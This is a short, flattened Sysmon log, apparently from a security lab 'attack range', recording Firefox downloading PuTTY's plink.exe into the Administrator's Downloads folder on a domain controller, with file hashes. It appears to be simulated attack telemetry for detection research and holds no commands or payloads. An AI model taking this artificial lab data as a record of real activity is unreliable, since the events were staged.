HostUrl=https://the.earth.li/~sgtatham/putty/0.77/w64/plink.exe 11241100x80000000000000007089153Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:24.445{D271FDA4-5436-6323-C9FE-000000007402}4560C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\Downloads\plink.exe:Zone.Identifier2022-09-15 16:35:23.409 15241500x80000000000000007089152Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:24.438{D271FDA4-5436-6323-C9FE-000000007402}4560C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\Downloads\plink.exe2022-09-15 16:35:23.409MD5=41C8E38B48C792EF480A19B8A857CD36,SHA256=653EDDE8520F10019C571F25AD6E61147C06EEECCC7639F69D61D1375CC71EAA- 11241100x80000000000000007088933Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:23.426{D271FDA4-5436-6323-C9FE-000000007402}4560C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\Downloads\plink.exe2022-09-15 16:35:23.426